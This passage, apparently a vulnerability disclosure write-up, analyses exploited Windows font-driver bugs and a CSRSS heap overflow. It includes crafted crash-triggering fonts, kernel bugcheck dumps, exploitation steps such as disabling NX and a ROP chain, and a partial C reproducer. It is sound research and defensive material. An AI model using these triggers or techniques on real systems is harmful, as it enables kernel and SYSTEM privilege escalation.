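#define PTR_SIZE      8u    /* 64-bit pointer */
#define VALUE_SIZE    4u    /* 32-bit fixed point value */

/* RSP-relative offset of ptrs[index]. */
static unsigned ptrs_offset(unsigned index) {
    return PTRS_OFFSET + PTR_SIZE * index;
}

/* RSP-relative offset of values[index]. */
static unsigned values_offset(unsigned index) {
    return VALUES_OFFSET + VALUE_SIZE * index;
}

/* Index of the values[] element that holds the low 32 bits of
 * ptrs[index], or -1 if that pointer lies below the values array. */
static int values_index_under_ptr(unsigned index) {
    unsigned off = ptrs_offset(index);
    if (off < VALUES_OFFSET) {
        return -1;
    }
    return (int)((off - VALUES_OFFSET) / VALUE_SIZE);
}
```

Under these assumptions ptrs[2] and ptrs[3] land on the saved RDI and the return address, ptrs[4] starts at values[0], and ptrs[5] starts at values[2], which matches the ((values[3]<<32)|values[2]) address described above.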

A proof-of-concept test case is easily crafted by taking any existing Type 1 font, and recompiling it (e.g. with the detype1 + type1 utilities as part of AFDKO) to add two extra objects to the .PFB file. A minimal sample in textual form is shown below:

~%!PS-AdobeFont-1.0: Test 001.001

dict begin

/FontInfo begin

/FullName (Test) def

end

/FontType 1 def

/FontMatrix [0.001 0 0 0.001 0 0] def

/WeightVector [0 0 0 0 0] def

/Private begin

/Blend begin

/VToHOrigin[[16705.25490 -0.00001 0 0 16962.25882]]

/end

end

currentdict end

%currentfile eexec /Private begin

/CharStrings 1 begin

/.notdef ## -| { endchar } |-

end

end

mark %currentfile closefile

cleartomark

The /WeightVector line sets numMasters to 5, and the /VToHOrigin line triggers a write of 0x42424242 (represented as 16962.25882) to 0xffffffff41414141 (16705.25490 and -0.00001). A crash can be reproduced by placing the PFB and PFM files in the same directory and opening the PFM file in the default Windows Font Viewer program. You should then be able to observe the following bugcheck in the kernel debugger:

PAGE_FAULT_IN_NONPAGED_AREA (50)

Invalid system memory was referenced.  This cannot be protected by try-except.

Typically the address is just plain bad or it is pointing at freed memory.

Arguments:

Arg1: ffffffff41414141, memory referenced.

Arg2: 0000000000000001, value 0 = read operation, 1 = write operation.

Arg3: fffff96000a86144, If non-zero, the instruction address which referenced the bad memory

        address.

Arg4: 0000000000000002, (reserved)

[...]

TRAP_FRAME:  ffffd000415eefa0 -- (.trap 0xffffd000415eefa0)

NOTE: The trap frame does not contain all registers.

Some register values may be zeroed or incorrect.

rax=0000000042424242 rbx=0000000000000000 rcx=ffffffff41414141

rdx=0000000000000005 rsi=0000000000000000 rdi=0000000000000000

rip=fffff96000a86144 rsp=ffffd000415ef130 rbp=0000000000000000

 r8=0000000000000000  r9=000000000000000e r10=0000000000000000

r11=00000000fffffffb r12=0000000000000000 r13=0000000000000000

r14=0000000000000000 r15=0000000000000000

iopl=0         nv up ei pl nz na po cy

ATMFD+0x22144:

fffff96000a86144 890499          mov     dword ptr [rcx+rbx*4],eax ds:ffffffff41414141=????????

Resetting default scope
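The decimal numbers in the /VToHOrigin line of the test font map to the 32-bit values seen in the bugcheck through 16.16 fixed point encoding. The sketch below shows that mapping in C. It assumes rounding to the nearest representable value, which is a guess that happens to reproduce the numbers from this post; the actual conversion inside atmfd.dll may differ, and both function names are hypothetical.

```c
#include <stdint.h>

/* Convert a decimal number to a 32-bit 16.16 fixed-point bit pattern,
 * rounding to the nearest representable value. The rounding mode is an
 * assumption; the real parser may behave differently. */
uint32_t to_fixed16_16(double value) {
  double scaled = value * 65536.0;  /* shift by 16 fractional bits */
  int64_t rounded = (int64_t)(scaled < 0 ? scaled - 0.5 : scaled + 0.5);
  return (uint32_t)(int32_t)rounded;  /* two's complement bit pattern */
}

/* Combine two adjacent 32-bit stack values into the 64-bit pointer
 * that overlaps them (little-endian: low half first). */
uint64_t make_pointer(uint32_t low, uint32_t high) {
  return ((uint64_t)high << 32) | low;
}
```

With this model, 16705.25490 encodes to 0x41414141, -0.00001 to 0xffffffff and 16962.25882 to 0x42424242, so the first two values combine into the faulting address 0xffffffff41414141 and the third is the value found in rax.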

Font bug #2

The second issue was found in the processing of the /BlendDesignPositions object, which is defined in the Adobe Font Metrics File Format Specification document from 1998. Its handler is located at offset 0x21608 of atmfd.dll, and again using the fontdrvhost.exe symbols, we can learn that its internal name is SetBlendDesignPositions. Let's analyze the C-like pseudo code:

int SetBlendDesignPositions(void *arg) {

  int num_master;

  Fixed16_16 values[16][15];

  for (num_master = 0; ; num_master++) {

    if (GetToken() != TOKEN_OPEN) {

      break;

    }

    int values_read = GetOpenFixedArray(&values[num_master], 15);

    SetNumAxes(values_read);

  }

  SetNumMasters(num_master);

  for (int i = 0; i < num_master; i++) {

    procs->BlendDesignPositions(i, &values[i]);

  }

  return 0;

}

The bug was simple. In the first for() loop, there was no upper bound enforced on the number of iterations, so one could read data into the arrays at &values[0], &values[1], ..., and then out-of-bounds at &values[16], &values[17] and so on. Most importantly, the GetOpenFixedArray function may read between 0 and 15 fixed point 32-bit values depending on the input file, so one could choose to write little or no data at specific offsets. This created a powerful non-contiguous stack corruption primitive, which made it possible to easily redirect execution to a specific address or build a ROP chain directly on the stack. For example, the SetBlendDesignPositions function itself was compiled with a /GS cookie, but it was possible to overwrite another return address higher up the call chain to hijack the control flow.
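To make the "non-contiguous" part concrete, here is a small C sketch of where a given values[row][col] element lands relative to the 16x15 array from the pseudo code. It assumes 4-byte Fixed16_16 elements, as stated above; the helper names are made up for illustration.

```c
#include <stddef.h>
#include <stdint.h>

#define MAX_MASTERS 16   /* rows in values[16][15] */
#define MAX_AXES    15   /* Fixed16_16 entries per row */

/* Byte offset of values[row][col] from the start of the array. */
size_t values_byte_offset(size_t row, size_t col) {
  return (row * MAX_AXES + col) * sizeof(uint32_t);
}

/* Nonzero if a write to values[row] lands outside the array. */
int row_is_out_of_bounds(size_t row) {
  return row >= MAX_MASTERS;
}

/* Distance in bytes between the end of the array and values[row][col];
 * only meaningful when row_is_out_of_bounds(row) is true. */
size_t bytes_past_end(size_t row, size_t col) {
  return values_byte_offset(row, col) - values_byte_offset(MAX_MASTERS, 0);
}
```

Each row is 60 bytes and the whole array is 960 bytes. Because an empty array in the font advances the row index without writing anything, an attacker can skip over data such as the /GS cookie and start writing at a chosen row; for instance, bytes_past_end(22, 4) is 376, i.e. values[22][4] sits 376 bytes beyond the end of the array.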

To trigger the bug, it is sufficient to load a Type 1 font that includes a specially crafted /BlendDesignPositions object:

~%!PS-AdobeFont-1.0: Test 001.001

dict begin

/FontInfo begin

/FullName (Test) def

end

/FontType 1 def

/FontMatrix [0.001 0 0 0.001 0 0] def

/BlendDesignPositions [[][][][][][][][][][][][][][][][][][][][][][][0 0 0 0 16705.25490 -0.00001]]

/Private begin

/Blend begin

/end

end

currentdict end

%currentfile eexec /Private begin

/CharStrings 1 begin

/.notdef ## -| { endchar } |-

end

end

mark %currentfile closefile

cleartomark

In the /BlendDesignPositions line, we first specify 22 empty arrays that don't corrupt any memory and only shift the index up to &values[22]. Then, we write the 32-bit values of 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x41414141, 0xffffffff to values[22][0..5]. On a vulnerable Windows 8.1, this coincides with the position of an unprotected return address higher on the stack. When such a font is loaded through GDI, the following kernel bugcheck is generated:

PAGE_FAULT_IN_NONPAGED_AREA (50)

Invalid system memory was referenced.  This cannot be protected by try-except.

Typically the address is just plain bad or it is pointing at freed memory.

Arguments:

Arg1: ffffffff41414141, memory referenced.

Arg2: 0000000000000008, value 0 = read operation, 1 = write operation.

Arg3: ffffffff41414141, If non-zero, the instruction address which referenced the bad memory

        address.

Arg4: 0000000000000002, (reserved)

[...]

TRAP_FRAME:  ffffd0003e7ca140 -- (.trap 0xffffd0003e7ca140)

NOTE: The trap frame does not contain all registers.

Some register values may be zeroed or incorrect.

rax=0000000000000000 rbx=0000000000000000 rcx=aae4a99ec7250000

rdx=0000000000000027 rsi=0000000000000000 rdi=0000000000000000

rip=ffffffff41414141 rsp=ffffd0003e7ca2d0 rbp=0000000000000002

 r8=0000000000000618  r9=0000000000000024 r10=fffff90000002000

r11=ffffd0003e7ca270 r12=0000000000000000 r13=0000000000000000

r14=0000000000000000 r15=0000000000000000

iopl=0         nv up ei ng nz na po nc

ffffffff`41414141 ??              ???

Resetting default scope

Exploitation

According to our analysis, the font exploit supported the following Windows versions:

  • Windows 8.1 (NT 6.3)
  • Windows 8 (NT 6.2)
  • Windows 7 (NT 6.1)
  • Windows Vista (NT 6.0)

When run on systems up to and including Windows 8, the exploit started off by triggering the write-what-where condition (bug #1) twice, to set up a minimalistic 8-byte bootstrap code at a fixed address around 0xfffff90000000000. This location corresponds to the win32k.sys session space, and is mapped as RWX in these old versions of Windows, which means that KASLR didn't have to be bypassed as part of the attack. As the next step, the exploit used bug #2 to redirect execution to the first stage payload. Each of these actions was performed through a single NtGdiAddRemoteFontToDC system call, which can conveniently load Type 1 fonts from memory (as previously discussed here), and was enough to reach both vulnerabilities. In total, the privilege escalation process took only three syscalls.

Things get more complicated on Windows 8.1, where the session space is no longer executable:

0: kd> !pte fffff90000000000

PXE at FFFFF6FB7DBEDF90          

contains 0000000115879863    

pfn 115879    ---DA--KWEV    

PPE at FFFFF6FB7DBF2000

contains 0000000115878863

pfn 115878    ---DA--KWEV

PDE at FFFFF6FB7E400000

contains 0000000115877863

pfn 115877    ---DA--KWEV

PTE at FFFFF6FC80000000

contains 8000000115976863

pfn 115976    ---DA--KW-V

As a result, the memory cannot be used so trivially as a staging area for the controlled kernel-mode code, but with a write-what-where primitive, there are many ways to work around it. In this specific exploit, the author switched from the session space to another page with a constant address: the shared user data region at 0xfffff78000000000. Notably, that page is not executable by default either, but thanks to the fixed location of page tables in Windows 8.1, it can be made executable with a single 32-bit write of value 0x0 to address 0xfffff6fbc0000004, which holds the upper 32 bits of the relevant page table entry. This is what the exploit did: it cleared the NX bit in the PTE, then wrote a 192-byte payload to the shared user page and executed it. This code path also performed some extra cleanup, first by restoring the NX bit and then erasing traces of the attack from memory.
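The address 0xfffff6fbc0000004 follows directly from the way x64 Windows self-maps its page tables. The C sketch below reproduces the calculation, assuming the fixed PTE base of 0xFFFFF68000000000 that matches the !pte output shown above; the function names are illustrative only.

```c
#include <stdint.h>

/* Base of the self-mapped page tables on x64 Windows versions that use a
 * fixed (non-randomized) location, such as Windows 8.1. */
#define PTE_BASE 0xFFFFF68000000000ULL

/* Virtual address of the PTE that maps `va`. */
uint64_t pte_address(uint64_t va) {
  uint64_t vpn = (va & 0x0000FFFFFFFFFFFFULL) >> 12;  /* 36-bit page number */
  return PTE_BASE + vpn * 8;                         /* 8 bytes per PTE */
}

/* Address of the upper 32 bits of that PTE, which contain the NX bit
 * (bit 63 of the 64-bit entry). */
uint64_t pte_high_dword_address(uint64_t va) {
  return pte_address(va) + 4;
}
```

For the session space address 0xfffff90000000000 this yields FFFFF6FC80000000, the same PTE location that !pte reports, and for the shared user data page at 0xfffff78000000000 the upper half of the PTE is at 0xfffff6fbc0000004. Writing zero there clears bit 63 (NX); it also zeroes the upper bits of the page frame number, which is presumably harmless as long as the page is backed by physical memory below 4 GiB.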

Once kernel execution reached the initial shellcode, a series of intermediary steps followed, each of them unpacking and jumping to the next, longer stage. Some code was encoded in the /FontMatrix PostScript object, some in the /FontBBox object, and even more directly in the font stream data. At this point, the exploit resolved the addresses of several exported symbols in ntoskrnl.exe, allocated RWX memory with an ExAllocatePoolWithTag(NonPagedPool) call, copied the final payload from the user-mode address space, and executed it. This is where we'll conclude our analysis, as the mechanics of the ring-0 shellcode are beyond the scope of this post.

The fixes

We reported the issues to Microsoft on March 17. Initially, they were subject to a 7-day deadline used by Project Zero for actively exploited vulnerabilities, but after receiving a request from the vendor, we agreed to provide an extension due to the global circumstances surrounding COVID-19. A security advisory was published by Microsoft on March 23, urging users to apply workarounds such as disabling the atmfd.dll font driver to mitigate the vulnerabilities. The fixes came out on April 14 as part of that month's Patch Tuesday, 28 days after our report.

Since both bugs were simple in nature, their fixes were equally simple. In the ParseBlendVToHOrigin function, both ptrs and values arrays were extended to 16 entries, and an extra sanity check was added to ensure that numMasters wouldn't exceed 16:

int ParseBlendVToHOrigin(void *arg) {

  Fixed16_16 *ptrs[16];

  Fixed16_16 values[16];

  if (g_font->numMasters > 0x10) {

    return -4;

  }

  [...]

}

In the SetBlendDesignPositions function, an extra bounds check was introduced to limit the number of loop iterations to 16:

int SetBlendDesignPositions(void *arg) {

  int num_master;

  Fixed16_16 values[16][15];

  for (num_master = 0; ; num_master++) {

    if (GetToken() != TOKEN_OPEN) {

      break;

    }

    if (num_master >= 16) {

      return -4;

    }

    int values_read = GetOpenFixedArray(&values[num_master], 15);

    SetNumAxes(values_read);

  }

  [...]

}

2. CSRSS issue on Windows 10 (CVE-2020-1027)

Background

The Client/Server Runtime Subsystem, or csrss.exe, is the user-mode part of the Win32 subsystem. Before Windows NT 4.0, CSRSS was in charge of the entire graphical user interface; nowadays, it implements tasks related to, for example, process and thread management.

csrss.exe is a user-mode process that runs with SYSTEM privileges. By default, every Win32 application opens a connection to CSRSS at startup. A significant number of API functions in Windows rely on the existence of the connection, so even the most restrictive application sandboxes, including the Chromium sandbox, can’t lock it down without causing stability problems. This makes CSRSS an appealing vector for privilege escalation attacks.

The communication with the subsystem server is performed via the ALPC mechanism, and the OS provides the high-level CSR API on top of it. The primary API function is called ntdll!CsrClientCallServer. It invokes a selected CSRSS routine and (optionally) receives the result:

NTSTATUS CsrClientCallServer(

    PCSR_API_MSG ApiMessage, 

    PVOID CaptureBuffer, 

    ULONG ApiNumber, 

    LONG DataLength);

The ApiNumber parameter determines which routine will be executed. ApiMessage is a pointer to a corresponding message object of size DataLength, and CaptureBuffer is a pointer to a buffer in a special shared memory region created during the connection initialization. CSRSS employs shared memory to transfer large and/or dynamically-sized structures, such as strings. ApiMessage can contain pointers to objects inside CaptureBuffer, and the API takes care of translating the pointers between the client and server virtual address spaces.

The reader can refer to this series of posts for a detailed description of the CSRSS internals.

One of the CSRSS modules, sxssrv.dll, implements the support for side-by-side assemblies. Side-by-side assembly (SxS) technology is a standard for executable files that is primarily aimed at alleviating problems, such as version conflicts, arising from the use of dynamic-link libraries. In SxS, Windows stores multiple versions of a DLL and loads them on demand. An application can include a side-by-side manifest, i.e. a special XML document, to specify its exact dependencies. An example of an application manifest is provided below:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">

  <assemblyIdentity type="win32" name="Microsoft.Windows.MySampleApp"

      version="1.0.0.0" processorArchitecture="x86"/>

  <dependency>

    <dependentAssembly>

      <assemblyIdentity type="win32" name="Microsoft.Tools.MyPrivateDll"

          version="2.5.0.0" processorArchitecture="x86"/>

    </dependentAssembly>

  </dependency>

</assembly>

The bug

The vulnerability in question was discovered in the routine sxssrv!BaseSrvSxsCreateActivationContext, which has the API number 0x10017. The function parses an application manifest and all its (potentially transitive) dependencies into a binary data structure called an activation context, and the current activation context determines the objects and libraries that need to be redirected to a specific implementation.

The relevant ApiMessage object contains several UNICODE_STRING parameters, such as the application name and assembly store path. UNICODE_STRING is a well-known mutable string structure with a separate field to keep the capacity (MaximumLength) of the backing store:

typedef struct _UNICODE_STRING {

  USHORT Length;

  USHORT MaximumLength;

  PWSTR  Buffer;

} UNICODE_STRING, *PUNICODE_STRING;

BaseSrvSxsCreateActivationContext starts with validating the string parameters:

for (i = 0; i < 6; ++i) {

  if (StringField = StringFields[i]) {

    Length = StringField->Length;

    if (Length && !StringField->Buffer ||

        Length > StringField->MaximumLength || Length & 1)

      return 0xC000000D;

    if (StringField->Buffer) {

      if (!CsrValidateMessageBuffer(ApiMessage, &StringField->Buffer,

                                    Length + 2, 1)) {

        DbgPrintEx(0x33, 0,

                   "SXS: Validation of message buffer 0x%lx failed.\n"

                   " Message:%p\n"

                   " String %p{Length:0x%x, MaximumLength:0x%x, Buffer:%p}\n",

                   i, ApiMessage, StringField, StringField->Length,

                   StringField->MaximumLength, StringField->Buffer);

        return 0xC000000D;

      }

      CharCount = StringField->Length >> 1;

      if (StringField->Buffer[CharCount] &&

          StringField->Buffer[CharCount - 1])

        return 0xC000000D;

    }

  }

}

CsrValidateMessageBuffer is declared as follows:

BOOLEAN CsrValidateMessageBuffer(

    PCSR_API_MSG ApiMessage,

    PVOID* Buffer,

    ULONG ElementCount,

    ULONG ElementSize);

This function verifies that 1) the *Buffer pointer references data inside the associated capture buffer, 2) the expression *Buffer + ElementCount * ElementSize doesn’t cause an integer overflow, and 3) it doesn’t go past the end of the capture buffer.
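The three checks can be modeled in a few lines of C. This is only a simplified sketch of the described behavior, not the real csrsrv implementation: the capture_region type and range_is_valid function are hypothetical, and the capture buffer is treated as one flat region.

```c
#include <stddef.h>
#include <stdint.h>

/* Simplified model of a capture buffer: a contiguous region of `size`
 * bytes starting at address `base`. */
typedef struct {
  uintptr_t base;
  size_t size;
} capture_region;

/* Returns 1 if [ptr, ptr + count * elem_size) lies inside the region. */
int range_is_valid(const capture_region *region, uintptr_t ptr,
                   uint32_t count, uint32_t elem_size) {
  /* Two 32-bit factors cannot overflow a 64-bit product. */
  uint64_t length = (uint64_t)count * elem_size;

  /* 1) The pointer must reference data inside the region. */
  if (ptr < region->base || ptr - region->base > region->size) return 0;

  /* 2) and 3) The end of the range must neither wrap around nor pass the
   * end of the region. Comparing against the remaining space avoids
   * computing ptr + length, which is where an overflow could occur. */
  uint64_t remaining = region->size - (ptr - region->base);
  return length <= remaining;
}
```

A check like this is only as good as the size passed to it. In the validation loop shown earlier, count is Length + 2 and elem_size is 1.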

As the reader can see, the buffer size for the validation is calculated based on the Length field rather than MaximumLength. This would be safe if the strings were only used as input parameters. Unfortunately, the string at offset 0x120 from the beginning of ApiMessage (we’ll be calling it ApplicationName) can also be re-used as an output parameter. The affected call stack looks as follows:

sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity

sxs!CNodeFactory::CreateNode

sxs!XMLParser::Run

sxs!SxspIncorporateAssembly

sxs!SxspCloseManifestGraph

sxs!SxsGenerateActivationContext

sxssrv!BaseSrvSxsCreateActivationContextFromStructEx

sxssrv!BaseSrvSxsCreateActivationContext

When BaseSrvSxsCreateActivationContextFromStructEx is called, it initializes an instance of the SXS_GENERATE_ACTIVATION_CONTEXT_PARAMETERS structure with the pointer to ApplicationName’s buffer and the unaudited MaximumLength value as the buffer size:

BufferCapacity = CreateCtxParams->ApplicationName.MaximumLength;

if (BufferCapacity) {

  GenActCtxParams.ApplicationNameCapacity = BufferCapacity >> 1;

  GenActCtxParams.ApplicationNameBuffer =

      CreateCtxParams->ApplicationName.Buffer;

} else {

  GenActCtxParams.ApplicationNameCapacity = 60;

  StringBuffer = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, 120);

  if (!StringBuffer) {

    Status = 0xC0000017;

    goto error;

  }

  GenActCtxParams.ApplicationNameBuffer = StringBuffer;

}

Then sxs!SxsGenerateActivationContext passes those values to ACTCTXGENCTX:

Context = (_ACTCTXGENCTX *)HeapAlloc(g_hHeap, 0, 0x10D8);

if (Context) {

  Context = _ACTCTXGENCTX::_ACTCTXGENCTX(Context);

} else {

  FusionpTraceAllocFailure(v14);

  SetLastError(0xE);

  goto error;

}

if (GenActCtxParams->ApplicationNameBuffer &&

    GenActCtxParams->ApplicationNameCapacity) {

  Context->ApplicationNameBuffer = GenActCtxParams->ApplicationNameBuffer;

  Context->ApplicationNameCapacity = GenActCtxParams->ApplicationNameCapacity;

}

Ultimately, sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity calls memcpy that can go past the end of the capture buffer:

IdentityNameBuffer = 0;

IdentityNameLength = 0;

SetLastError(0);

if (!SxspGetAssemblyIdentityAttributeValue(0, v11, &s_IdentityAttribute_name,

                                           &IdentityNameBuffer,

                                           &IdentityNameLength)) {

  CallSiteInfo = off_16506FA20;

  goto error;

}

if (IdentityNameLength &&

    IdentityNameLength < Context->ApplicationNameCapacity) {

  memcpy(Context->ApplicationNameBuffer, IdentityNameBuffer,

         2 * IdentityNameLength + 2);

  Context->ApplicationNameLength = IdentityNameLength;

} else {

  *Context->ApplicationNameBuffer = 0;

  Context->ApplicationNameLength = 0;

}

The source data for the memcpy call comes from the name parameter of the main assemblyIdentity node in the manifest.
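The mismatch between what is validated and what is later trusted can be expressed as simple arithmetic. The C sketch below models the sizes involved, following the pseudo code above; the function names are hypothetical.

```c
#include <stdint.h>

/* Bytes that the initial validation loop checks for a string field:
 * Length plus a terminating 16-bit null character. */
uint32_t validated_bytes(uint16_t length) {
  return (uint32_t)length + 2;
}

/* Capacity in 16-bit characters derived from the unchecked MaximumLength. */
uint32_t capacity_chars(uint16_t maximum_length) {
  return maximum_length >> 1;
}

/* Bytes copied by memcpy for a name of `name_chars` characters, or 0 if
 * the capacity check rejects the name. */
uint32_t copied_bytes(uint32_t name_chars, uint16_t maximum_length) {
  if (name_chars && name_chars < capacity_chars(maximum_length))
    return 2 * name_chars + 2;
  return 0;
}
```

Plugging in the values used by the reproducer in Appendix A (a 28-character ApplicationName, so Length is 56, MaximumLength patched to 0x8000, and an assemblyIdentity name of 0x2000 characters): only 58 bytes of the buffer are validated, the derived capacity is 0x4000 characters, and memcpy copies 0x4002 bytes.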

Exploitation

Even though the vulnerability was present in older versions of Windows, the exploit only targets Windows 10. All major builds up to 18363 are supported.

As a result of the vulnerability, the attacker can call memcpy with fully controlled contents and size. This is one of the best initial primitives a memory corruption bug can provide, but there’s one potential issue. So far it seems like the bug allows the attacker to write data either past the end of the capture buffer in a shared memory region, which they can already write to from the sandboxed process, or past the end of the shared region, in which case it’s quite difficult to reliably make a “useful” allocation right next to the region. Luckily for the attacker, the vulnerable code actually operates on a copy of the original capture buffer, which is made by csrsrv!CsrCaptureArguments to avoid potential issues caused by concurrent modification of the buffer contents, and the copy is allocated in the regular heap.

The logical first step of the exploit would be to leak some data needed for an ASLR bypass. However, the following design quirks in Windows and CSRSS make it unnecessary:

  • Windows randomizes module addresses once per boot, and csrss.exe is a regular user-mode process. This means that the attacker can use modules loaded in both csrss.exe and the compromised sandboxed process, for example, ntdll.dll, for code-reuse attacks.

  • csrss.exe provides client processes with its virtual address of the shared region during initialization so they can adjust pointers for API calls. The offset between the “local” and “remote” addresses is stored in ntdll!CsrPortMemoryRemoteDelta. Thus, the attacker can store, e.g., fake structures needed for the attack in the shared mapping at a predictable address.

The exploit also has to bypass another security feature, Microsoft’s Control Flow Guard, which makes it significantly more difficult to jump into a code reuse gadget chain via an indirect function call. The attacker has decided to exploit the CFG’s inability to protect return addresses on the stack to gain control of the instruction pointer. The complete algorithm looks as follows:

1. Groom the heap. The exploit makes a preliminary CreateActivationContext call with a specially crafted manifest needed to massage the heap into a predictable state. It contains an XML node with numerous attributes in the form aa:aabN="BB...BB". The manifest for the second call, which actually triggers the vulnerability, contains similar but different-sized attributes.

2. Implement write-what-where. The buffer overflow is used to overwrite the contents of XMLParser::_MY_XML_NODE_INFO nodes. _MY_XML_NODE_INFO may optionally contain a pointer to an internal character buffer. During subsequent parsing, if the current element is a numeric character entity (i.e. a string in the form &#x01234;), the parser calls XMLParser::CopyText to store the decoded character in the internal buffer of the currently active _MY_XML_NODE_INFO node. Therefore, by overwriting multiple nodes, the exploit can write data of any size to a controlled address.

3. Overwrite the loaded module list. The primitive gained in the previous step is used to modify the pointer to the loaded module list located in the PEB_LDR_DATA structure inside ntdll.dll, which is possible because the attacker has already obtained the base address of the library from the sandboxed process. The fake module list consists of numerous LDR_MODULE entries and is stored in the shared memory region. The unofficial definition of the structure is shown below:

typedef struct _LDR_MODULE {

  LIST_ENTRY InLoadOrderModuleList;

  LIST_ENTRY InMemoryOrderModuleList;

  LIST_ENTRY InInitializationOrderModuleList;

  PVOID BaseAddress;

  PVOID EntryPoint;

  ULONG SizeOfImage;

  UNICODE_STRING FullDllName;

  UNICODE_STRING BaseDllName;

  ULONG Flags;

  SHORT LoadCount;

  SHORT TlsIndex;

  LIST_ENTRY HashTableEntry;

  ULONG TimeDateStamp;

} LDR_MODULE, *PLDR_MODULE;

When a new thread is created, the ntdll!LdrpInitializeThread function will follow the module list and, provided that the necessary flags are set, run the function referenced by the EntryPoint member with BaseAddress as the first argument. The EntryPoint call is still protected by the CFG, so the exploit can’t jump to a ROP chain yet. However, this gives the attacker the ability to execute an arbitrary sequence of one-argument function calls.

4. Launch a new thread. The exploit deliberately causes a null pointer dereference. The exception handler in csrss.exe catches it and creates an error-reporting task in a new thread via csrsrv!CsrReportToWerSvc.

5. Restore the module list. Once the execution reaches the fake module list processing, it’s important to restore PEB_LDR_DATA’s original state to avoid crashes in other threads. The attacker has discovered that a pair of ntdll!RtlPopFrame and ntdll!RtlPushFrame calls can be used to copy an 8-byte value from one given address to another. The fake module list starts with such a pair to fix the loader data structure.

6. Leak the stack register. In this step the exploit takes full advantage of the shared memory region. First, it calls setjmp to leak the register state into the shared region. The next module entry points to itself, so the execution enters an infinite loop of NtYieldExecution calls. In the meantime, the sandboxed process detects that the data in the setjmp buffer has been modified. It calculates the return address location for the LdrpInitializeThread stack frame, sets it as the destination address for a subsequent copy operation, and modifies the InLoadOrderModuleList pointer of the current module entry, thus breaking the loop.

7. Overwrite the return address. After the exploit exits the loop in csrss.exe, it performs two more copy operations: overwrites the return address with a stack pivot pointer, and puts the fake stack address next to it. Then, when LdrpInitializeThread returns, the execution continues in the ROP chain.

8. Transition to winlogon.exe. The ROP payload creates a new memory section and shares it with both winlogon.exe, which is another highly-privileged Windows process, and the sandboxed process. Then it creates a new thread in winlogon.exe using an address inside the section as the entry point. The sandboxed process writes the final stage of the exploit to the section, which downloads and executes an implant. The rest of the ROP payload is needed to restore the normal state of csrss.exe and terminate the error reporting thread.

The fix

We reported the issue to Microsoft on March 23. Similarly to the font bugs, it was subject to a 7-day deadline used by Project Zero for actively exploited vulnerabilities, but after receiving a request from the vendor, we agreed to provide an extension due to the global circumstances surrounding COVID-19. The fix came out 22 days after our report.

The patch renamed BaseSrvSxsCreateActivationContext to BaseSrvSxsCreateActivationContextFromMessage and added an extra CsrValidateMessageBuffer call for the ApplicationName field, this time with MaximumLength as the size argument:

ApplicationName = ApiMessage->CreateActivationContext.ApplicationName;

if (ApplicationName.MaximumLength &&

    !CsrValidateMessageBuffer(ApiMessage, &ApplicationName.Buffer,

                              ApplicationName.MaximumLength, 1)) {

  SavedMaximumLength = ApplicationName.MaximumLength;

  ApplicationName.MaximumLength = ApplicationName.Length + 2;

}

[...]

if (SavedMaximumLength)

  ApiMessage->CreateActivationContext.ApplicationName.MaximumLength =

      SavedMaximumLength;

return result;

Appendix A

The following reproducer has been tested on Windows 10.0.18363.959.

#include <stdint.h>

#include <stdio.h>

#include <windows.h>

#include <string>

const char* MANIFEST_CONTENTS =

    "<?xml version='1.0' encoding='UTF-8' standalone='yes'?>"

    "<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>"

    "<assemblyIdentity name='@' version='1.0.0.0' type='win32' "

    "processorArchitecture='amd64'/>"

    "</assembly>";

const WCHAR* NULL_BYTE_STR = L"\x00\x00";

const WCHAR* MANIFEST_NAME =

  L"msil_system.data.sqlxml.resources_b77a5c561934e061_3.0.4100.17061_en-us_"

  L"d761caeca23d64a2.manifest";

const WCHAR* PATH = L"\\\\.\\c:Windows\\";

const WCHAR* MODULE = L"System.Data.SqlXml.Resources";

typedef PVOID(__stdcall* f_CsrAllocateCaptureBuffer)(ULONG ArgumentCount,

                                                     ULONG BufferSize);

f_CsrAllocateCaptureBuffer CsrAllocateCaptureBuffer;

typedef NTSTATUS(__stdcall* f_CsrClientCallServer)(PVOID ApiMessage,

                                                   PVOID CaptureBuffer,

                                                   ULONG ApiNumber,

                                                   ULONG DataLength);

f_CsrClientCallServer CsrClientCallServer;

typedef NTSTATUS(__stdcall* f_CsrCaptureMessageString)(LPVOID CaptureBuffer,

                                                       PCSTR String,

                                                       ULONG Length,

                                                       ULONG MaximumLength,

                                                       PSTR OutputString);

f_CsrCaptureMessageString CsrCaptureMessageString;

NTSTATUS CaptureUnicodeString(LPVOID CaptureBuffer, PSTR OutputString,

                              PCWSTR String, ULONG Length = 0) {

  if (Length == 0) {

    Length = lstrlenW(String);

  }

  return CsrCaptureMessageString(CaptureBuffer, (PCSTR)String, Length * 2,

                                 Length * 2 + 2, OutputString);

}

int main() {

  HMODULE Ntdll = LoadLibrary(L"Ntdll.dll");

  CsrAllocateCaptureBuffer = (f_CsrAllocateCaptureBuffer)GetProcAddress(

      Ntdll, "CsrAllocateCaptureBuffer");

  CsrClientCallServer =

      (f_CsrClientCallServer)GetProcAddress(Ntdll, "CsrClientCallServer");

  CsrCaptureMessageString = (f_CsrCaptureMessageString)GetProcAddress(

      Ntdll, "CsrCaptureMessageString");

  char Message[0x220];

  memset(Message, 0, 0x220);

  PVOID CaptureBuffer = CsrAllocateCaptureBuffer(4, 0x300);

  std::string Manifest = MANIFEST_CONTENTS;

  Manifest.replace(Manifest.find('@'), 1, 0x2000, 'A');

  // There's no public definition of the relevant CSR_API_MSG structure.

  // The offsets and values are taken directly from the exploit.

  *(uint32_t*)(Message + 0x40) = 0xc1;

  *(uint16_t*)(Message + 0x44) = 9;

  *(uint16_t*)(Message + 0x59) = 0x201;

  // CSRSS loads the manifest contents from the client process memory;

  // therefore, it doesn't have to be stored in the capture buffer.

  *(const char**)(Message + 0x80) = Manifest.c_str();

  *(uint64_t*)(Message + 0x88) = Manifest.size();

  *(uint64_t*)(Message + 0xf0) = 1;

  CaptureUnicodeString(CaptureBuffer, Message + 0x48, NULL_BYTE_STR, 2);

  CaptureUnicodeString(CaptureBuffer, Message + 0x60, MANIFEST_NAME);

  CaptureUnicodeString(CaptureBuffer, Message + 0xc8, PATH);

  CaptureUnicodeString(CaptureBuffer, Message + 0x120, MODULE);

